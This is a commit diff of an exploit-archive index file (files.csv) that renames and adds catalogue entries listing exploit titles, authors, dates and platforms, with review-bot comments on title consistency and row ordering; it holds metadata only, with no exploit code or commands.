DB: 2017-01-13
13 new exploits SeaMonkey 1.1.14 - (marquee) Denial of Service SeaMonkey 1.1.14 - Denial of Service Adobe Flash Player 24.0.0.186 - 'ActionGetURL2' Out-of-Bounds Memory Corruption Adobe Flash Player 24.0.0.186 - 'ActionGetURL2' Out-of-Bounds Memory Corruption (1) SapLPD 7.40 - Denial of Service CoolPlayer 2.19 - (PlaylistSkin) Buffer Overflow CoolPlayer 2.19 - 'PlaylistSkin' Buffer Overflow Rosoft media player 4.4.4 - Buffer Overflow (SEH) (2) Rosoft Media Player 4.4.4 - Buffer Overflow (SEH) (2) aSc Timetables 2017 - Buffer Overflow Nginx (Debian-Based Distributions) - 'logrotate' Local Privilege Escalation Nginx (Debian-Based + Gentoo) - 'logrotate' Local Privilege Escalation Cemu 1.6.4b - Information Leak + Buffer Overflow (Emulator Breakout) Cemu 1.6.4b - Information Leak / Buffer Overflow (Emulator Breakout) PlaySMS 0.7 - SQL Injection PlaySms 0.7 - SQL Injection SAP SAPLPD 6.28 - Buffer Overflow (Metasploit) SapLPD 6.28 - Buffer Overflow (Metasploit) Microsoft Windows Media Player 7.0 - '.wms' Arbitrary Script (MS00-090) phpMyFamily 1.4.0 - Authentication Bypass (SQL Injection) phpMyFamily 1.4.0 - Authentication Bypass ACNews 1.0 - Admin Authentication Bypass (SQL Injection) ACNews 1.0 - Authentication Bypass ASPThai.Net Guestbook 5.5 - (Authentication Bypass) SQL Injection ASPThai.Net Guestbook 5.5 - Authentication Bypass PNphpBB2 <= 1.2g - 'phpbb_root_path' Remote File Inclusion PNphpBB2 <= 1.2g - 'phpbb_root_path' Parameter Remote File Inclusion cutenews aj-fork 167f - 'cutepath' Parameter Remote File Inclusion CuteNews aj-fork 167f - 'cutepath' Parameter Remote File Inclusion WSN Guest 1.21 - (comments.php id) SQL Injection WSN Guest 1.21 - 'id' Parameter SQL Injection PNPHPBB2 <= 1.2 - (index.php c) SQL Injection PNPHPBB2 <= 1.2 - 'index.php' SQL Injection PNPHPBB2 <= 1.2i - viewforum.php SQL Injection PNPHPBB2 <= 1.2i - 'viewforum.php' SQL Injection PNPHPBB2 <= 1.2i - (printview.php PHPEx) Local File Inclusion PNPHPBB2 <= 1.2i - 'PHPEx' Parameter Local 
File Inclusion webClassifieds 2005 - (Authentication Bypass) SQL Injection webClassifieds 2005 - Authentication Bypass webSPELL 4.01.02 - 'id' Remote Edit Topics PNphpBB2 <= 12i - (ModName) Multiple Local File Inclusion WSN Guest 1.23 - 'Search' SQL Injection webSPELL 4.01.02 - 'id' Parameter Remote Edit Topics PNphpBB2 <= 1.2i - (ModName) Multiple Local File Inclusion WSN Guest 1.23 - 'Search' Parameter SQL Injection Ayemsis Emlak Pro - (Authentication Bypass) SQL Injection Ayemsis Emlak Pro - Authentication Bypass Joomla! Component com_phocadocumentation - 'id' SQL Injection phpauctionsystem - Cross-Site Scripting / SQL Injection Joomla! Component com_phocadocumentation - 'id' Parameter SQL Injection PHPAuctionSystem - Cross-Site Scripting / SQL Injection RiotPix 0.61 - (forumid) Blind SQL Injection RiotPix 0.61 - 'forumid' Parameter Blind SQL Injection RiotPix 0.61 - (Authentication Bypass) SQL Injection RiotPix 0.61 - Authentication Bypass playSms 0.9.3 - Multiple Remote / Local File Inclusion BlogHelper - 'common_db.inc' Remote Config File Disclosure PollHelper - 'poll.inc' Remote Config File Disclosure PlaySms 0.9.3 - Multiple Remote / Local File Inclusion BlogHelper - Remote Config File Disclosure PollHelper - Remote Config File Disclosure Fast FAQs System - (Authentication Bypass) SQL Injection Fast FAQs System - Authentication Bypass Fast Guest Book - (Authentication Bypass) SQL Injection Fast Guest Book - Authentication Bypass BKWorks ProPHP 0.50b1 - (Authentication Bypass) SQL Injection Weight Loss Recipe Book 3.1 - (Authentication Bypass) SQL Injection BKWorks ProPHP 0.50b1 - Authentication Bypass Weight Loss Recipe Book 3.1 - Authentication Bypass Dark Age CMS 0.2c Beta - (Authentication Bypass) SQL Injection Syzygy CMS 0.3 - (Authentication Bypass) SQL Injection Dark Age CMS 0.2c Beta - Authentication Bypass Syzygy CMS 0.3 - Authentication Bypass eFAQ - (Authentication Bypass) SQL Injection eReservations - (Authentication Bypass) SQL Injection The 
Walking Club - (Authentication Bypass) SQL Injection Ping IP - (Authentication Bypass) SQL Injection eFAQ - Authentication Bypass eReservations - Authentication Bypass The Walking Club - Authentication Bypass Ping IP - Authentication Bypass ASP ActionCalendar 1.3 - (Authentication Bypass) SQL Injection ASP ActionCalendar 1.3 - Authentication Bypass Click&Email - (Authentication Bypass) SQL Injection Click&Email - Authentication Bypass Web-Calendar Lite 1.0 - (Authentication Bypass) SQL Injection Web-Calendar Lite 1.0 - Authentication Bypass ClickAuction - (Authentication Bypass) SQL Injection ClickAuction - Authentication Bypass Netartmedia Car Portal 1.0 - (Authentication Bypass) SQL Injection Netartmedia Car Portal 1.0 - Authentication Bypass SalesCart - (Authentication Bypass) SQL Injection SalesCart - Authentication Bypass WholeHogSoftware Ware Support - (Authentication Bypass) SQL Injection WholeHogSoftware Password Protect - (Authentication Bypass) SQL Injection WholeHogSoftware Ware Support - Authentication Bypass WholeHogSoftware Password Protect - Authentication Bypass ClickCart 6.0 - (Authentication Bypass) SQL Injection ClickCart 6.0 - Authentication Bypass Online Grades 3.2.4 - (Authentication Bypass) SQL Injection Online Grades 3.2.4 - Authentication Bypass MyDesing Sayac 2.0 - (Authentication Bypass) SQL Injection MyDesing Sayac 2.0 - Authentication Bypass AuthPhp 1.0 - (Authentication Bypass) SQL Injection Mynews 0_10 - (Authentication Bypass) SQL Injection BlueBird Pre-Release - (Authentication Bypass) SQL Injection AuthPhp 1.0 - Authentication Bypass Mynews 0_10 - Authentication Bypass BlueBird Pre-Release - Authentication Bypass Grestul 1.x - Authentication Bypass (via Cookie SQL Injection) Grestul 1.x - Authentication Bypass (Cookie SQL Injection) XGuestBook 2.0 - (Authentication Bypass) SQL Injection XGuestBook 2.0 - Authentication Bypass PenPal 2.0 - (Authentication Bypass) SQL Injection PenPal 2.0 - Authentication Bypass BannerManager 0.81 - 
(Authentication Bypass) SQL Injection BannerManager 0.81 - Authentication Bypass Free PHP Petition Signing Script - (Authentication Bypass) SQL Injection Free PHP Petition Signing Script - Authentication Bypass Simbas CMS 2.0 - (Authentication Bypass) SQL Injection WebFileExplorer 3.1 - (Authentication Bypass) SQL Injection Simbas CMS 2.0 - Authentication Bypass WebFileExplorer 3.1 - Authentication Bypass My Dealer CMS 2.0 - (Authentication Bypass) SQL Injection My Dealer CMS 2.0 - Authentication Bypass XEngineSoft PMS/MGS/NM/Ams 1.0 - (Authentication Bypass) SQL Injection XEngineSoft PMS/MGS/NM/Ams 1.0 - Authentication Bypass NetHoteles 2.0/3.0 - (Authentication Bypass) SQL Injection NetHoteles 2.0/3.0 - Authentication Bypass Tiny Blogr 1.0.0 rc4 - (Authentication Bypass) SQL Injection Tiny Blogr 1.0.0 rc4 - Authentication Bypass ClanTiger 1.1.1 - (Authentication Bypass) SQL Injection ClanTiger 1.1.1 - Authentication Bypass Hot Project 7.0 - (Authentication Bypass) SQL Injection Hot Project 7.0 - Authentication Bypass EZ Webitor - (Authentication Bypass) SQL Injection EZ Webitor - Authentication Bypass Creasito E-Commerce 1.3.16 - (Authentication Bypass) SQL Injection Creasito E-Commerce 1.3.16 - Authentication Bypass I-Rater Pro/Plantinum 4.0 - (Authentication Bypass) SQL Injection I-Rater Pro/Plantinum 4.0 - Authentication Bypass 5 star Rating 1.2 - (Authentication Bypass) SQL Injection 5 star Rating 1.2 - Authentication Bypass Tiger Dms - (Authentication Bypass) SQL Injection Tiger Dms - Authentication Bypass The Recipe Script 5 - (Authentication Bypass) SQL Injection / DB Backup Realty Web-Base 1.0 - (Authentication Bypass) SQL Injection Luxbum 0.5.5/stable - (Authentication Bypass) SQL Injection The Recipe Script 5 - (Authentication Bypass) SQL Injection / Database Backup Realty Web-Base 1.0 - Authentication Bypass Luxbum 0.5.5/stable - Authentication Bypass My Game Script 2.0 - (Authentication Bypass) SQL Injection My Game Script 2.0 - Authentication Bypass 
Submitter Script - (Authentication Bypass) SQL Injection Submitter Script - Authentication Bypass PHP Dir Submit - (Authentication Bypass) SQL Injection PHP Dir Submit - Authentication Bypass DM FileManager 3.9.2 - (Authentication Bypass) SQL Injection DM FileManager 3.9.2 - Authentication Bypass VICIDIAL 2.0.5-173 - (Authentication Bypass) SQL Injection VICIDIAL 2.0.5-173 - Authentication Bypass Article Directory - (Authentication Bypass) SQL Injection Article Directory - Authentication Bypass phpBugTracker 1.0.3 - (Authentication Bypass) SQL Injection phpBugTracker 1.0.3 - Authentication Bypass Zen Help Desk 2.1 - (Authentication Bypass) SQL Injection Zen Help Desk 2.1 - Authentication Bypass EgyPlus 7ml 1.0.1 - (Authentication Bypass) SQL Injection EgyPlus 7ml 1.0.1 - Authentication Bypass Pixelactivo 3.0 - (Authentication Bypass) SQL Injection Pixelactivo 3.0 - Authentication Bypass MyCars Automotive - (Authentication Bypass) SQL Injection MyCars Automotive - Authentication Bypass Zip Store Chat 4.0/5.0 - (Authentication Bypass) SQL Injection Zip Store Chat 4.0/5.0 - Authentication Bypass AlumniServer 1.0.1 - (Authentication Bypass) SQL Injection AlumniServer 1.0.1 - Authentication Bypass ForumPal FE 1.1 - (Authentication Bypass) SQL Injection ForumPal FE 1.1 - Authentication Bypass Opial 1.0 - (Authentication Bypass) SQL Injection Opial 1.0 - Authentication Bypass webLeague 2.2.0 - (Authentication Bypass) SQL Injection webLeague 2.2.0 - Authentication Bypass AnotherPHPBook (APB) 1.3.0 - (Authentication Bypass) SQL Injection AnotherPHPBook (APB) 1.3.0 - Authentication Bypass SaphpLesson 4.0 - (Authentication Bypass) SQL Injection SaphpLesson 4.0 - Authentication Bypass Limny 1.01 - (Authentication Bypass) SQL Injection Limny 1.01 - Authentication Bypass Magician Blog 1.0 - (Authentication Bypass) SQL Injection Magician Blog 1.0 - Authentication Bypass AW BannerAd - (Authentication Bypass) SQL Injection AW BannerAd - Authentication Bypass Ajax Short URL Script - 
(Authentication Bypass) SQL Injection Ajax Short URL Script - Authentication Bypass TT Web Site Manager 0.5 - (Authentication Bypass) SQL Injection SimpleLoginSys 0.5 - (Authentication Bypass) SQL Injection TT Web Site Manager 0.5 - Authentication Bypass SimpleLoginSys 0.5 - Authentication Bypass Questions Answered 1.3 - (Authentication Bypass) SQL Injection Questions Answered 1.3 - Authentication Bypass Blink Blog System - (Authentication Bypass) SQL Injection Blink Blog System - Authentication Bypass MOC Designs PHP News 1.1 - (Authentication Bypass) SQL Injection MOC Designs PHP News 1.1 - Authentication Bypass PHotoLa Gallery 1.0 - (Authentication Bypass) SQL Injection PHotoLa Gallery 1.0 - Authentication Bypass PHPCityPortal - (Authentication Bypass) SQL Injection PHPCityPortal - Authentication Bypass Logoshows BBS 2.0 - (Authentication Bypass) SQL Injection Logoshows BBS 2.0 - Authentication Bypass SmilieScript 1.0 - (Authentication Bypass) SQL Injection SmilieScript 1.0 - Authentication Bypass humanCMS - (Authentication Bypass) SQL Injection humanCMS - Authentication Bypass Three Pillars Help Desk 3.0 - (Authentication Bypass) SQL Injection Three Pillars Help Desk 3.0 - Authentication Bypass AdsDX 3.05 - (Authentication Bypass) SQL Injection AdsDX 3.05 - Authentication Bypass Nephp Publisher Enterprise 4.5 - (Authentication Bypass) SQL Injection Nephp Publisher Enterprise 4.5 - Authentication Bypass W3infotech - (Authentication Bypass) SQL Injection W3infotech - Authentication Bypass Real Estate Portal X.0 - (Authentication Bypass) SQL Injection Real Estate Portal X.0 - Authentication Bypass PHP Inventory 1.2 - Remote Authentication Bypass (SQL Injection) PHP Inventory 1.2 - Authentication Bypass SitePal 1.1 - (Authentication Bypass) SQL Injection SitePal 1.1 - Authentication Bypass JM CMS 1.0 <= 1.0 - (Authentication Bypass) SQL Injection JM CMS 1.0 - Authentication Bypass Pre Hospital Management System - (Authentication Bypass) SQL Injection Pre Hospital 
Management System - Authentication Bypass Digiappz Freekot - (Authentication Bypass) SQL Injection Digiappz Freekot - Authentication Bypass Omnistar Affiliate - (Authentication Bypass) SQL Injection Omnistar Affiliate - Authentication Bypass PRE HOTELS&RESORTS MANAGEMENT SYSTEM - (Authentication Bypass) SQL Injection PRE HOTELS&RESORTS MANAGEMENT SYSTEM - Authentication Bypass Advance Biz Limited 1.0 - (Authentication Bypass) SQL Injection Advance Biz Limited 1.0 - Authentication Bypass e-topbiz banner exchange PHP - (Authentication Bypass) SQL Injection e-topbiz Slide Popups 1 PHP - (Authentication Bypass) SQL Injection e-topbiz banner exchange PHP - Authentication Bypass e-topbiz Slide Popups 1 PHP - Authentication Bypass Freewebscript'z Games - (Authentication Bypass) SQL Injection Freewebscript'z Games - Authentication Bypass DZOIC Handshakes - Authentication Bypass (SQL Injection) DZOIC Handshakes - Authentication Bypass DZOIC ClipHouse - Authentication Bypass (SQL Injection) DZOIC ClipHouse - Authentication Bypass PHP Car Rental-Script - (Authentication Bypass) SQL Injection PHP Car Rental-Script - Authentication Bypass Zen Tracking 2.2 - (Authentication Bypass) SQL Injection Baal Systems 3.8 - (Authentication Bypass) SQL Injection Zen Tracking 2.2 - Authentication Bypass Baal Systems 3.8 - Authentication Bypass Killmonster 2.1 - (Authentication Bypass) SQL Injection Killmonster 2.1 - Authentication Bypass Rostermain 1.1 - (Authentication Bypass) SQL Injection Rostermain 1.1 - Authentication Bypass NewsLetter Tailor - (Authentication Bypass) SQL Injection NewsLetter Tailor - Authentication Bypass WSN Guest 1.02 - (orderlinks) SQL Injection WSN Guest 1.02 - 'orderlinks' Parameter SQL Injection Project Man 1.0 - (Authentication Bypass) SQL Injection Project Man 1.0 - Authentication Bypass Uiga Fan Club 1.0 - (Authentication Bypass) SQL Injection Uiga Fan Club 1.0 - Authentication Bypass HazelPress Lite 0.0.4 - (Authentication Bypass) SQL Injection HazelPress 
Lite 0.0.4 - Authentication Bypass Majoda CMS - (Authentication Bypass) SQL Injection Majoda CMS - Authentication Bypass 4x CMS r26 - (Authentication Bypass) SQL Injection 4x CMS r26 - Authentication Bypass Satellite-X 4.0 - (Authentication Bypass) SQL Injection Huron CMS 8 11 2007 - (Authentication Bypass) SQL Injection Satellite-X 4.0 - Authentication Bypass Huron CMS 8 11 2007 - Authentication Bypass Zyke CMS 1.1 - (Authentication Bypass) SQL Injection Zyke CMS 1.1 - Authentication Bypass Online University - (Authentication Bypass) SQL Injection Online University - Authentication Bypass Online Job Board - (Authentication Bypass) SQL Injection Online Job Board - Authentication Bypass JE CMS 1.0.0 - Authentication Bypass (via SQL Injection) JE CMS 1.0.0 - Authentication Bypass ExtCalendar2 - (Authentication Bypass/Cookie) SQL Injection ExtCalendar2 - (Authentication Bypass / Cookie) SQL Injection SN News 1.2 - '/admin/loger.php' Authentication Bypass (SQL Injection) SN News 1.2 - '/admin/loger.php' Authentication Bypass RTTucson Quotations Database Script - (Authentication Bypass) SQL Injection RTTucson Quotations Database Script - Authentication Bypass PlaySms - 'index.php' Cross-Site Scripting PlaySms 0.8 - 'index.php' Cross-Site Scripting Practico CMS 13.7 - Authentication Bypass (SQL Injection) Practico CMS 13.7 - Authentication Bypass Airbnb Clone Script - Arbitrary File Upload Milw0rm Clone Script 1.0 - (Authentication Bypass) SQL Injection Milw0rm Clone Script 1.0 - Authentication Bypass PHPCollab CMS 2.5 - (emailusers.php) SQL Injection PHPCollab CMS 2.5 - 'emailusers.php' SQL Injection My link trader 1.1 - 'id' Parameter SQL Injection My Link Trader 1.1 - 'id' Parameter SQL Injection b2evolution 6.8.2 - Arbitrary File Upload Job Portal Script 9.11 - Authentication Bypass Online Food Delivery 2.04 - Authentication Bypass iTechscripts Freelancer Script 5.11 - 'sk' Parameter SQL Injection D-Link DIR-615 - Multiple Vulnerabilities School Management Software 
2.75 - SQL Injection Penny Auction Script - Arbitrary File Upload ECommerce-TIBSECART - Arbitrary File Upload ECommerce-Multi-Vendor Software - Arbitrary File Upload
parent 3617e005f6
commit a0c8330781
16 changed files with 751 additions and 156 deletions
313
files.csv
|
@ -896,7 +896,7 @@ id,file,description,date,author,platform,type,port
|
|||
7649,platforms/windows/dos/7649.pl,"Destiny Media Player 1.61 - '.m3u' Local Buffer Overflow (PoC)",2009-01-02,"aBo MoHaMeD",windows,dos,0
|
||||
7652,platforms/windows/dos/7652.pl,"Destiny Media Player 1.61 - '.lst' Local Buffer Overflow (PoC)",2009-01-03,Encrypt3d.M!nd,windows,dos,0
|
||||
7673,platforms/multiple/dos/7673.html,"Apple Safari - 'ARGUMENTS' Array Integer Overflow PoC (New Heap Spray)",2009-01-05,Skylined,multiple,dos,0
|
||||
7685,platforms/multiple/dos/7685.pl,"SeaMonkey 1.1.14 - (marquee) Denial of Service",2009-01-06,StAkeR,multiple,dos,0
|
||||
7685,platforms/multiple/dos/7685.pl,"SeaMonkey 1.1.14 - Denial of Service",2009-01-06,StAkeR,multiple,dos,0
|
||||
7693,platforms/windows/dos/7693.pl,"Perception LiteServe 2.0.1 - (user) Remote Buffer Overflow (PoC)",2009-01-07,Houssamix,windows,dos,0
|
||||
7694,platforms/windows/dos/7694.py,"Audacity 1.6.2 - '.aup' Remote Off-by-One Crash",2009-01-07,Stack,windows,dos,0
|
||||
7696,platforms/windows/dos/7696.pl,"Winamp GEN_MSN Plugin - Heap Buffer Overflow (PoC)",2009-01-07,SkD,windows,dos,0
|
||||
|
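Review bot: The new title for row 7685 drops "(marquee)" entirely, which was the only part of the description naming the element that triggers the crash, and leaves "SeaMonkey 1.1.14 - Denial of Service". The same commit turns "(PlaylistSkin)" into 'PlaylistSkin' for CoolPlayer 2.19 rather than deleting it, so the consistent form here would be "SeaMonkey 1.1.14 - 'marquee' Denial of Service".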
@ -5335,10 +5335,11 @@ id,file,description,date,author,platform,type,port
|
|||
40985,platforms/linux/dos/40985.txt,"QNAP NAS Devices - Heap Overflow",2017-01-02,bashis,linux,dos,0
|
||||
40994,platforms/multiple/dos/40994.html,"Brave Browser 1.2.16/1.9.56 - Address Bar URL Spoofing",2017-01-08,"Aaditya Purani",multiple,dos,0
|
||||
40996,platforms/php/dos/40996.txt,"DirectAdmin 1.50.1 - Denial of Service",2017-01-08,"IeDb ir",php,dos,0
|
||||
41008,platforms/multiple/dos/41008.txt,"Adobe Flash Player 24.0.0.186 - 'ActionGetURL2' Out-of-Bounds Memory Corruption",2017-01-11,COSIG,multiple,dos,0
|
||||
41008,platforms/multiple/dos/41008.txt,"Adobe Flash Player 24.0.0.186 - 'ActionGetURL2' Out-of-Bounds Memory Corruption (1)",2017-01-11,COSIG,multiple,dos,0
|
||||
41012,platforms/multiple/dos/41012.txt,"Adobe Flash Player 24.0.0.186 - 'ActionGetURL2' Out-of-Bounds Memory Corruption (2)",2017-01-11,COSIG,multiple,dos,0
|
||||
41018,platforms/windows/dos/41018.txt,"Boxoft Wav 1.0 - Buffer Overflow",2017-01-11,Vulnerability-Lab,windows,dos,0
|
||||
41025,platforms/windows/dos/41025.txt,"VideoLAN VLC Media Player 2.2.1 - 'DecodeAdpcmImaQT' Buffer Overflow",2016-05-27,"Patrick Coleman",windows,dos,0
|
||||
41030,platforms/windows/dos/41030.py,"SapLPD 7.40 - Denial of Service",2016-12-28,"Peter Baris",windows,dos,0
|
||||
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
|
||||
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
|
||||
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
|
||||
|
@ -5967,7 +5968,7 @@ id,file,description,date,author,platform,type,port
|
|||
7681,platforms/linux/local/7681.txt,"Debian XTERM - (DECRQSS/comments)",2009-01-06,"Paul Szabo",linux,local,0
|
||||
7684,platforms/windows/local/7684.pl,"Rosoft Media Player 4.2.1 - Local Buffer Overflow",2009-01-06,Encrypt3d.M!nd,windows,local,0
|
||||
7688,platforms/windows/local/7688.pl,"Cain & Abel 4.9.25 - (Cisco IOS-MD5) Local Buffer Overflow",2009-01-07,send9,windows,local,0
|
||||
7692,platforms/windows/local/7692.pl,"CoolPlayer 2.19 - (PlaylistSkin) Buffer Overflow",2009-01-07,"Jeremy Brown",windows,local,0
|
||||
7692,platforms/windows/local/7692.pl,"CoolPlayer 2.19 - 'PlaylistSkin' Buffer Overflow",2009-01-07,"Jeremy Brown",windows,local,0
|
||||
7695,platforms/windows/local/7695.pl,"VUPlayer 2.49 - '.pls' Universal Buffer Overflow",2009-01-07,SkD,windows,local,0
|
||||
7702,platforms/windows/local/7702.c,"GOM Player 2.0.12.3375 - '.asx' Stack Overflow",2009-01-08,DATA_SNIPER,windows,local,0
|
||||
7707,platforms/windows/local/7707.py,"IntelliTamper (2.07/2.08) - Language Catalog SEH Overflow",2009-01-08,Cnaph,windows,local,0
|
||||
|
@ -6501,7 +6502,7 @@ id,file,description,date,author,platform,type,port
|
|||
14630,platforms/windows/local/14630.py,"Mediacoder 0.7.5.4710 - 'Universal' Buffer Overflow (SEH)",2010-08-12,Dr_IDE,windows,local,0
|
||||
14633,platforms/windows/local/14633.py,"Xion Player 1.0.125 - Stack Buffer Overflow",2010-08-13,corelanc0d3r,windows,local,0
|
||||
14676,platforms/windows/local/14676.pl,"A-PDF WAV to MP3 Converter 1.0.0 - '.m3u' Stack Buffer Overflow",2010-08-17,d4rk-h4ck3r,windows,local,0
|
||||
14651,platforms/windows/local/14651.py,"Rosoft media player 4.4.4 - Buffer Overflow (SEH) (2)",2010-08-15,dijital1,windows,local,0
|
||||
14651,platforms/windows/local/14651.py,"Rosoft Media Player 4.4.4 - Buffer Overflow (SEH) (2)",2010-08-15,dijital1,windows,local,0
|
||||
14663,platforms/windows/local/14663.py,"MUSE 4.9.0.006 - '.m3u' Local Buffer Overflow",2010-08-16,"Glafkos Charalambous",windows,local,0
|
||||
14664,platforms/windows/local/14664.py,"MUSE 4.9.0.006 - '.pls' Local Universal Buffer Overflow (SEH)",2010-08-16,"Glafkos Charalambous",windows,local,0
|
||||
14673,platforms/windows/local/14673.py,"Triologic Media Player 8 - '.m3u' Local Universal Unicode Buffer Overflow (SEH)",2010-08-17,"Glafkos Charalambous",windows,local,0
|
||||
|
@ -7369,6 +7370,7 @@ id,file,description,date,author,platform,type,port
|
|||
20409,platforms/windows/local/20409.c,"NetcPlus BrowseGate 2.80.2 - Weak Encryption",2000-11-18,"Steven Alexander",windows,local,0
|
||||
20410,platforms/unix/local/20410.cpp,"Jan Hubicka Koules 1.4 - Svgalib Buffer Overflow",2000-11-20,Synnergy.net,unix,local,0
|
||||
20411,platforms/linux/local/20411.c,"Oracle 8.x - cmctl Buffer Overflow",2000-11-20,anonymous,linux,local,0
|
||||
41031,platforms/windows/local/41031.txt,"aSc Timetables 2017 - Buffer Overflow",2017-01-12,"Peter Baris",windows,local,0
|
||||
20417,platforms/osx/local/20417.c,"Tunnelblick - Privilege Escalation (1)",2012-08-11,zx2c4,osx,local,0
|
||||
20418,platforms/solaris/local/20418.txt,"Solaris 10 Patch 137097-01 - Symlink Attack Privilege Escalation",2012-08-11,"Larry Cashdollar",solaris,local,0
|
||||
20436,platforms/unix/local/20436.sh,"Apple Mac OSX 10 / HP-UX 9/10/11 / Mandriva 6/7 / RedHat 5/6 / SCO 5 / IRIX 6 - Shell redirection Race Condition",2000-01-02,proton,unix,local,0
|
||||
|
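Review bot: New row 41031 is placed between 20411 and 20417, in the middle of the 204xx local entries, while the other 2017 local rows (40995, 41015, 41020, 41021, 41022) sit together at the end of the local block, just before the remote rows restart at id 1. If files.csv is meant to be ordered by id within each type, move the row after 41022. If the placement is deliberate, as the 40768 row among the 289xx entries suggests it might be, the ordering rule needs to be written down, because any tool that assumes id order or does a sorted merge will misplace these rows.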
@ -8060,7 +8062,7 @@ id,file,description,date,author,platform,type,port
|
|||
28955,platforms/windows/local/28955.py,"Internet Haut Debit Mobile PCW_MATMARV1.0.0B03 - Buffer Overflow (SEH)",2013-10-14,metacom,windows,local,0
|
||||
28969,platforms/windows/local/28969.py,"Beetel Connection Manager PCW_BTLINDV1.0.0B04 - Buffer Overflow (SEH)",2013-10-15,metacom,windows,local,0
|
||||
28984,platforms/hp-ux/local/28984.pl,"HP Tru64 4.0/5.1 - POSIX Threads Library Privilege Escalation",2006-11-13,"Adriel T. Desautels",hp-ux,local,0
|
||||
40768,platforms/linux/local/40768.sh,"Nginx (Debian-Based Distributions) - 'logrotate' Local Privilege Escalation",2016-11-16,"Dawid Golunski",linux,local,0
|
||||
40768,platforms/linux/local/40768.sh,"Nginx (Debian-Based + Gentoo) - 'logrotate' Local Privilege Escalation",2016-11-16,"Dawid Golunski",linux,local,0
|
||||
29069,platforms/windows/local/29069.c,"Computer Associates Personal Firewall 9.0 - HIPS Driver 'kmxfw.sys' Privilege Escalation",2006-11-16,"Ruben Santamarta",windows,local,0
|
||||
29070,platforms/windows/local/29070.c,"Computer Associates Personal Firewall 9.0 - HIPS Driver 'kmxstart.sys' Privilege Escalation",2006-11-16,"Ruben Santamarta",windows,local,0
|
||||
29102,platforms/openbsd/local/29102.c,"OpenBSD 3.9/4.0 - ld.so Local Environment Variable Clearing",2006-11-20,"Mark Dowd",openbsd,local,0
|
||||
|
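Review bot: The new title for row 40768 introduces "+" as a list separator in "(Debian-Based + Gentoo)", while the same commit replaces "+" with "/" in the Cemu 1.6.4b title ("Information Leak + Buffer Overflow" becomes "Information Leak / Buffer Overflow"). Use one separator throughout, for example "Nginx (Debian-Based / Gentoo) - 'logrotate' Local Privilege Escalation". Note also that "Distributions" was dropped, so "Debian-Based" now reads as an adjective without a noun.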
@ -8750,7 +8752,7 @@ id,file,description,date,author,platform,type,port
|
|||
40995,platforms/windows/local/40995.txt,"Advanced Desktop Locker 6.0.0 - Lock Screen Bypass",2017-01-08,Squnity,windows,local,0
|
||||
41015,platforms/windows/local/41015.c,"Microsoft Windows Kernel - 'win32k.sys' 'NtSetWindowLongPtr' Privilege Escalation (MS16-135) (2)",2017-01-08,"Rick Larabee",windows,local,0
|
||||
41020,platforms/windows/local/41020.c,"Microsoft Windows 8.1 (x64) - RGNOBJ Integer Overflow (MS16-098)",2017-01-03,Saif,windows,local,0
|
||||
41021,platforms/multiple/local/41021.txt,"Cemu 1.6.4b - Information Leak + Buffer Overflow (Emulator Breakout)",2017-01-09,Wack0,multiple,local,0
|
||||
41021,platforms/multiple/local/41021.txt,"Cemu 1.6.4b - Information Leak / Buffer Overflow (Emulator Breakout)",2017-01-09,Wack0,multiple,local,0
|
||||
41022,platforms/linux/local/41022.txt,"Firejail - Privilege Escalation",2017-01-09,"Daniel Hodson",linux,local,0
|
||||
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
|
||||
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
|
||||
|
@ -8928,7 +8930,7 @@ id,file,description,date,author,platform,type,port
|
|||
398,platforms/linux/remote/398.c,"rsync 2.5.1 - Remote Exploit (1)",2002-01-01,Teso,linux,remote,873
|
||||
399,platforms/linux/remote/399.c,"rsync 2.5.1 - Remote Exploit (2)",2002-01-01,Teso,linux,remote,873
|
||||
400,platforms/linux/remote/400.c,"GV PostScript Viewer - Remote Buffer Overflow (2)",2004-08-18,infamous41md,linux,remote,0
|
||||
404,platforms/linux/remote/404.pl,"PlaySMS 0.7 - SQL Injection",2004-08-19,"Noam Rathaus",linux,remote,0
|
||||
404,platforms/linux/remote/404.pl,"PlaySms 0.7 - SQL Injection",2004-08-19,"Noam Rathaus",linux,remote,0
|
||||
405,platforms/linux/remote/405.c,"XV 3.x - BMP Parsing Local Buffer Overflow",2004-08-20,infamous41md,linux,remote,0
|
||||
408,platforms/linux/remote/408.c,"Qt - '.bmp' Parsing Bug Heap Overflow",2004-08-21,infamous41md,linux,remote,0
|
||||
409,platforms/bsd/remote/409.c,"BSD TelnetD - Remote Command Execution (1)",2001-06-09,Teso,bsd,remote,23
|
||||
|
@ -10519,7 +10521,7 @@ id,file,description,date,author,platform,type,port
|
|||
16335,platforms/windows/remote/16335.rb,"WinComLPD 3.0.2 - Buffer Overflow (Metasploit)",2010-06-22,Metasploit,windows,remote,0
|
||||
16336,platforms/windows/remote/16336.rb,"NIPrint LPD - Request Overflow (Metasploit)",2010-12-25,Metasploit,windows,remote,0
|
||||
16337,platforms/windows/remote/16337.rb,"Hummingbird Connectivity 10 SP5 - LPD Buffer Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,0
|
||||
16338,platforms/windows/remote/16338.rb,"SAP SAPLPD 6.28 - Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0
|
||||
16338,platforms/windows/remote/16338.rb,"SapLPD 6.28 - Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0
|
||||
16339,platforms/windows/remote/16339.rb,"Motorola Timbuktu Pro - Directory Traversal / Arbitrary File Upload (Metasploit)",2010-11-24,Metasploit,windows,remote,0
|
||||
16340,platforms/windows/remote/16340.rb,"Oracle 8i - TNS Listener 'ARGUMENTS' Buffer Overflow (Metasploit)",2010-11-24,Metasploit,windows,remote,0
|
||||
16341,platforms/windows/remote/16341.rb,"Oracle 8i - TNS Listener SERVICE_NAME Buffer Overflow (Metasploit)",2010-11-24,Metasploit,windows,remote,0
|
||||
|
@ -11782,6 +11784,7 @@ id,file,description,date,author,platform,type,port
|
|||
